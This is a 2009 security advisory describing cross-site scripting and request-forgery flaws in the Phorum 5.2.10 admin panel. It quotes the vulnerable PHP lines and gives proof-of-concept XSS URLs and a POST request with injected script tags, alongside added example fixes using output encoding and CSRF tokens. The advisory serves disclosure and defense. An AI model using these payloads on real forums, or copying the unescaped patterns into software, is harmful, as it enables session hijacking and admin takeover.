From: research_(at)_voodoo-labs.org <research_(at)_voodoo-labs.org>
Date: 17 April 2009
Subject: Phorum < 5.2.10 Cross-Site Scripting/Request Forgery

#=cicatriz <[email protected]>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
#=Phorum < 5.2.10 Cross-Site Scripting/Request Forgery=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Advisory & Vulnerability Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

       Title: Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
       Advisory ID: VUDO-2009-1504
       Advisory URL: http://research.voodoo-labs.org/advisories/4
       Date found: 10-4-2009
       Vendors contacted: Phorum
       Class: Multiple Vulnerabilities
       Remotely Exploitable: Yes
       Locally Exploitable: No
       Exploit/PoC Available: Yes
       Policy: Full Disclosure Policy (RFPolicy) v2.0

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Tested & Vulnerable packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

       [+] Phorum 5.2.10
       [+] Phorum 5.2-dev

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Solutions and Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Phorum released some important fixes for the Cross-Site Scripting vulnerabilities [1].

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Technical Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Phorum [2] suffers from a series of Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)
vulnerabilities, through the admin panel and the "file uploading" section (via an uploaded XML file; this
only works with a crafted XUL file and when the victim is using Mozilla Firefox as browser). Some other
vulnerabilities:

[*] Cross-Site Scripting (XSS):
       
       The simplest XSS can be executed easily; the flaw can be found in the file
       "include/admin/banlist.php":
       
       +++include/admin/banlist.php @@ 88:104
           88      if($_GET["curr"] && $_GET["delete"]){
           89  
           90          ?>
           91  
           92          <div class="PhorumInfoMessage">
           93              Are you sure you want to delete this entry?
           94              <form action="<?php echo $PHORUM["admin_http_path"] ?>" method="post">
           95                  <input type="hidden" name="module" value="<?php echo $module; ?>" />
XXX         96                  <input type="hidden" name="curr" value="<?php echo $_GET['curr']; ?>" />
           97                  <input type="hidden" name="delete" value="1" />
           98                  <input type="submit" name="confirm" value="Yes" />&nbsp;<input type="submit" name="confirm" value="No" />
           99              </form>
          100          </div>
          101  
          102          <?php
          103  
          104      } else {
       ---include/admin/banlist.php
       
       The same security flaw can be found in the file "include/admin/banlist.php", line 94, and can also be
       exploited with a single GET request.
       Here is another XSS, more difficult to exploit, because the attacker needs to modify the user's
       cookies to store the vector and then redirect the user to the "versioncheck.php" file:
       
       +++versioncheck.php @@ 79:83
           79    <?php if ($upgrade_available) { ?>
           80      <div class="notify_upgrade">
XXX         81        <a target="_top" href="admin.php?module=version">New Phorum version <?php print $upgrade_available ?> available!</a>
           82      </div>
           83    <?php } else { ?>
       ---versioncheck.php

       There is another XSS in the file "include/admin/users.php", but it can only be exploited through a POST
       request, on these lines:
       
       +++include/admin/users.php @@ 87:93
           87          //check for a valid email
           88          if (!empty($_POST["email"])) {
           89              include('./include/email_functions.php');
           90              $valid_email = phorum_valid_email($_POST["email"]);
           91              if ($valid_email !== true)
XXX         92                  $error = "The email \"$_POST[email]\" is not valid!";
           93          }
       ---include/admin/users.php
       
       Line 82 of the same file is also vulnerable to the same attack.
       In the users.php file there is another vulnerable line, reachable through the request's Referer header or
       the $_POST['referrer'] parameter:
       
       +++include/admin/users.php @@ 52:59
           52  if (isset($_POST['referrer'])) {
XXX         53      $referrer = $_POST['referrer'];
           54      unset($_POST['referrer']);
           55  } elseif (isset($_SERVER['HTTP_REFERER'])) {
XXX         56      $referrer = $_SERVER['HTTP_REFERER'];
           57  } else {
           58      $rererrer = "{$PHORUM["admin_http_path"]}?module=users";
           59  }
       ---include/admin/users.php
       +++include/admin/users.php @@ 659:661
          659  
XXX        660      $frm->hidden("referrer", $referrer);
          661  
       ---include/admin/users.php

       One way to fix this is to use htmlspecialchars(), htmlentities() or any other function that
       encodes the output before it is echoed into the page, e.g.:
       
       +++
       <input type="hidden" name="curr" value="<?php echo htmlentities($_GET['curr'], ENT_QUOTES, 'UTF-8'); ?>" />
       ---
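       The same idea carried through the three reflected values named above (the "curr" id, the admin
       e-mail error message and the referrer), as an added example that is not Phorum's own code. The
       helper name esc() is an assumption; $PHORUM['admin_http_path'] is assumed to be set by Phorum's
       bootstrap as in the listings above.

```php
<?php
// Added example, not part of the advisory or of Phorum: output encoding plus
// input validation for the reflected values discussed above. The helper name
// esc() is hypothetical; $PHORUM['admin_http_path'] is assumed to be already
// defined by Phorum's bootstrap, as in the quoted source listings.

function esc(string $value): string
{
    // Encode &, <, >, " and ' so the value can never close an attribute or a tag.
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 1. The "are you sure you want to delete this entry?" form: the entry id is
//    numeric, so reject anything else first and still encode it on output.
$curr = filter_input(INPUT_GET, 'curr', FILTER_VALIDATE_INT);
if ($curr === false || $curr === null) {
    http_response_code(400);
    exit('Invalid entry id');
}
echo '<input type="hidden" name="curr" value="' . esc((string) $curr) . '" />';

// 2. The users.php e-mail error: the submitted address is reflected into the
//    page, so it is encoded before it becomes part of the message.
$email = (string) ($_POST['email'] ?? '');
if ($email !== '' && filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
    $error = 'The email "' . esc($email) . '" is not valid!';
}

// 3. The users.php referrer: accept only a URL on the admin panel's own host;
//    a POST parameter or Referer header pointing elsewhere falls back to the
//    default, and the value is encoded when written into the hidden field.
$default   = $PHORUM['admin_http_path'] . '?module=users';
$referrer  = (string) ($_POST['referrer'] ?? ($_SERVER['HTTP_REFERER'] ?? $default));
$adminHost = parse_url($PHORUM['admin_http_path'], PHP_URL_HOST);
if ($adminHost === null || parse_url($referrer, PHP_URL_HOST) !== $adminHost) {
    $referrer = $default;
}
echo '<input type="hidden" name="referrer" value="' . esc($referrer) . '" />';
```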
       
       
[*] Cross-Site Request Forgery (CSRF):
       
       All the forms on the admin panel are vulnerable to CSRF because of the lack of security tokens that
       would confirm the administrator really wants to perform those actions. Without a token an attacker can
       create a new user with admin rights, or change the administrator's password and other personal data.
       Another kind of action can be triggered with a simple bbcode [img] tag: when the administrator views
       the [img] tag with a specially crafted URL, an action such as deleting a topic could be executed.
       A more dangerous attack can lead to JavaScript execution.
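       A per-session anti-CSRF token for the admin forms, as an added example that is not Phorum's own code
       and not the vendor's fix. The function names csrf_token(), csrf_field() and csrf_check() are
       hypothetical; requiring POST also covers the [img]-triggered GET actions described above.

```php
<?php
// Added example, not part of the advisory or of Phorum: one random token per
// session, embedded in every state-changing admin form and verified before
// any action runs. Function names are hypothetical.
session_start();

function csrf_token(): string
{
    // Create the 256-bit token on first use and reuse it for the session.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Hidden input to place inside every admin form that changes state.
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '" />';
}

function csrf_check(): void
{
    // A cross-site form post or an [img]-triggered GET cannot carry a token
    // matching the victim's session, so both are rejected here. hash_equals()
    // keeps the comparison constant-time.
    $sent = (string) ($_POST['csrf_token'] ?? '');
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || empty($_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], $sent)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
}

// Usage in an admin module: verify before acting, emit the field when rendering.
if (isset($_POST['addUser'])) {
    csrf_check();            // nothing below runs for a forged request
    // ... create the user here ...
}
echo '<form action="admin.php" method="post">'
   . csrf_field()
   . '<input type="hidden" name="module" value="users" />'
   . '<input type="submit" name="addUser" value="Add" />'
   . '</form>';
```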
       
       
[3] Other vulnerabilities were found in this application. (WHK)

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] Cross-Site Scripting (XSS):

       +++
       http://localhost/phorum-5.2.10/admin.php?module=banlist&curr=1"><img/src/onerror="alert('voodoo');&delete=1
       ---
       
       +++
       http://www.victim.com/phorum-5.2.10/admin.php?module=badwords&curr=1"><img/src/onerror="alert('voodoo');&delete=1
       ---
       
       +++
       javascript:with(document)cookie="phorum_upgrade_available=<iframe/src='javascript:alert(/voodoo/.source)'>",
       location="http://www.victim.com/phorum-5.2.10/versioncheck.php";
       ---
       
       +++
       POST /phorum-5.2.10/admin.php HTTP/1.1
       
       module=users&referrer=http%3A%2F%2Fwww.victim.com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers&addUser=1&username=xss&real_name=xss&email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%27voodoo%27%29%3B%22%3E&password1=xss&password2=xss&admin=0
       ---
       
[*] Cross-Site Request Forgery (CSRF):

       Other CSRF proof-of-concept exploits can be found at:
               [*] http://research.voodoo-labs.org/code/exploits/phorum/5.2.10/
               
       If the administrator views this specially crafted HTML page, his password will be changed to a string
       chosen by the attacker. (uuencoded)
       
       
[*] CSRF + XSS:

       This is another way to exploit those two types of attacks (XSS and CSRF) together. If the administrator
       views this page, a new folder will be created whose name is a specially crafted HTML tag containing a
       JavaScript script. (uuencoded)
       

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Reporting Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

       [*] 10-04-2009: Bugs discovered.
       [*] 10-04-2009: Voodoo contacted the vendor (advisory draft included).
       [*] 13-04-2009: The vendor released fixes for Cross-Site Scripting vulnerabilities.
       [*] 15-04-2009: Advisory VUDO-2009-1504 published.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

       [1] http://trac.phorum.org/changeset/4009
       [2] http://www.phorum.org/
       [3] http://foro.elhacker.net/nivel_web/multiples_fallas_en_phorum_5210-t248300.0.html


#=Wed 15 Apr 2009 ART=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
